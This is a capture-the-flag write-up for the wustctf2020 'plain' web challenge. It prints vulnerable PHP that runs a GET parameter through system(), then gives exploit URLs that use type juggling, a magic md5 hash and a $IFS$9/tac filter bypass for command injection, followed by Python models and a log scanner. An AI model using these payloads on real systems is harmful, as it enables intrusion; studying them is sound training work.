[wustctf2020] plain_ WP
2022-07-05 06:20:00 【Acco_ 30_ L】
Analysis
- Opening the challenge shows nothing but "hack me"; the page itself gives no usable information, so look at the source code.
- The page encoding is broken, but one lead is still visible: bot, which brings to mind robots.txt, the file that states a site's crawler rules.
robots.txt sits in the web root. Crawlers use it to decide which pages of the site they are allowed to fetch.
- robots.txt
It tells every crawler not to access the file /fAke_f1agggg.php in the root directory.
Given that hint, we obviously want to visit it and see whether it holds anything useful: /fAke_f1agggg.php
I was stuck here; looking at the source shows nothing.
Obtaining the flag
- Try capturing the request with a proxy; the response header contains the useful information.
- /fl4g.php
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);

//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo " I inadvertently looked at my Rolex , I don't want to see the time , Just want to inadvertently , Let you know I'm better than you .</br>";
    }else{
        die(" Money can't solve the essential problem of the poor ");
    }
}else{
    die(" Go to Africa ");
}

//level 2
if (isset($_GET['md5'])){
    $md5=$_GET['md5'];
    if ($md5==md5($md5))
        echo " Think of this CTFer Get flag after , grateful , Run to Donglan bank , Find a restaurant , Get the chef out of here , Stir fry two special dishes by yourself , Pour a glass of white wine in bulk , How to get rich , Don't be a little violent .</br>";
    else
        die(" I quickly called my fair weather friend , He made a phone call , Put his family in Africa ");
}else{
    die(" Go to Africa ");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo " Think of it here. , I'm full and happy , The happiness of rich people is often so simple and unadorned , And it's boring .</br>";
        system($get_flag);
    }else{
        die(" It's almost Africa ");
    }
}else{
    die(" Go to Africa ");
}
?>
Visiting /fl4g.php with no parameters only prints "Go to Africa", so nothing else appears and it is time for a code audit.
Level 1
intval() returns the integer value of a variable.
(intval($num) < 2020 && intval($num + 1) > 2021)
That is, the integer value of the supplied num must be below 2020, while the integer value of num + 1 must be above 2021.
Following that idea we can try the code below. But for some reason my local PHP does not show this difference, so we pass the parameters straight to the challenge and check there.
<?php
echo intval('2e4');
echo intval(2e4);
echo intval('2e4'+1);
echo intval(2e4+1);
echo intval(1e10);
echo intval('1e10');
?>
http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=%272e4%27
Money can't solve the essential problem of the poor
http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4
I inadvertently looked at my Rolex , I don't want to see the time , Just want to inadvertently , Let you know I'm better than you .
The bypass succeeds, and we can conclude that the passed-in parameter is automatically treated as a string, so the quotes are not needed.
Level 2
md5() computes the MD5 hash of a string.
($md5==md5($md5))
That is, the parameter must be loosely (==) equal to its own MD5 hash. A known value that satisfies this: md5(0e215962017,32) = 0e291242476940776845150308577824
Pass in the parameter:
http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4&md5=0e215962017
Bypass succeeded.
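The type juggling behind levels 1 and 2 can be checked offline with the following Python model. It is an added example, not part of the original write-up, and it assumes the PHP 5 / 7.0 rules the challenge server evidently uses (intval() keeps only a string's leading digits, while + and == convert the whole numeric string); level2_strict is a hypothetical hardened version of the level 2 check.

```python
import hashlib
import hmac
import re

# Numeric-string grammar PHP uses for arithmetic and for loose (==) comparison.
NUMERIC = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$')
# What intval()/strtol keeps from a string in PHP 5 / 7.0: the leading integer only.
LEADING_INT = re.compile(r'^\s*[+-]?\d+')


def php5_intval(value):
    """intval(): numbers truncate, strings keep only their leading digits ('2e4' -> 2)."""
    if isinstance(value, (int, float)):
        return int(value)
    m = LEADING_INT.match(value)
    return int(m.group(0)) if m else 0

def php_plus(value, n):
    """'+' on a string converts the whole numeric string first ('2e4' + 1 -> 20001.0)."""
    if isinstance(value, str) and NUMERIC.match(value):
        return float(value) + n
    return php5_intval(value) + n

def php_loose_eq(a, b):
    """== on two strings: if both look numeric they compare as numbers, so '0e1' == '0e2'."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)
    return a == b

def level1_passes(num):
    """The level 1 guard from fl4g.php under the semantics modelled above."""
    return php5_intval(num) < 2020 and php5_intval(php_plus(num, 1)) > 2021

def level2_passes(md5_param):
    """The level 2 guard: $md5 == md5($md5) with PHP's loose comparison."""
    digest = hashlib.md5(md5_param.encode()).hexdigest()
    return php_loose_eq(md5_param, digest)

def level2_strict(md5_param):
    """Hypothetical fix: strict, constant-time comparison (PHP: hash_equals / ===)."""
    digest = hashlib.md5(md5_param.encode()).hexdigest()
    return hmac.compare_digest(md5_param, digest)


if __name__ == "__main__":
    print(level1_passes("2e4"), level1_passes("'2e4'"))               # True False
    print(level2_passes("0e215962017"), level2_strict("0e215962017"))  # True False
```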
Get flag
if(!strstr($get_flag," ")){
    $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
    echo " Think of it here. , I'm full and happy , The happiness of rich people is often so simple and unadorned , And it's boring .</br>";
    system($get_flag);
- strstr(str1, str2) checks whether the string str2 occurs in str1. If it does, the function returns the part of str1 starting at the first occurrence of str2; otherwise it returns NULL.
str_ireplace() replaces some characters in a string, case-insensitively.
- So the get_flag step has three requirements:
  - The parameter must contain no spaces.
  - Any cat in the parameter is replaced by wctf2020.
  - The parameter is executed as a system command.
http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4&md5=0e215962017&get_flag=ls
- http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
tac bypasses the cat filter and $IFS$9 bypasses the space check. Flag:
flag{6c1c57d3-5462-42d3-be85-df3998d042c7}
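From the defender's side, the following Python scanner (an added example, not from the write-up) reproduces the filter in fl4g.php on constructed access-log lines and reports every get_flag value that would reach system(), marking the $IFS space substitution the page uses. The log format and addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not taken from the page): an unrelated hit, the
# two requests the write-up sends to fl4g.php, and one that omits get_flag.
SAMPLE_LOG = """\
10.0.0.7 "GET /index.php?page=home HTTP/1.1" 200
10.0.0.5 "GET /fl4g.php?num=2e4&md5=0e215962017&get_flag=ls HTTP/1.1" 200
10.0.0.5 "GET /fl4g.php?num=2e4&md5=0e215962017&get_flag=tac$IFS$9fllllag HTTP/1.1" 200
10.0.0.5 "GET /fl4g.php?num=2e4&md5=0e215962017 HTTP/1.1" 200
"""

REQUEST_LINE = re.compile(r'^(\S+) "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')
# Whitespace that is not a literal space: $IFS / ${IFS} (as in the page's
# $IFS$9 trick) and tab / newline characters left after URL decoding.
SPACE_SUBSTITUTE = re.compile(r'\$\{?IFS\}?|[\t\n\r]')
SHELL_META = re.compile(r'[;&|`<>]|\$\(')


def php_filter(cmd):
    """fl4g.php's own filter: reject a literal space, then replace 'cat' case-insensitively."""
    if " " in cmd:
        return None
    return re.sub("cat", "wctf2020", cmd, flags=re.IGNORECASE)


def scan_log(text):
    """One finding per request whose get_flag value would reach system() after the filter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        parts = urlsplit(target)
        if parts.path != "/fl4g.php":
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for raw in params.get("get_flag", []):
            cmd = php_filter(raw)
            if cmd is None:  # blocked by the space check, nothing executed
                continue
            findings.append({
                "client": client,
                "command": cmd,  # what system() actually runs after the cat rewrite
                "space_bypass": bool(SPACE_SUBSTITUTE.search(raw)),
                "metachar": bool(SHELL_META.search(raw)),
            })
    return findings
```

Run scan_log(SAMPLE_LOG) to get two findings: a plain "ls" and the "tac$IFS$9..." command flagged as a space bypass.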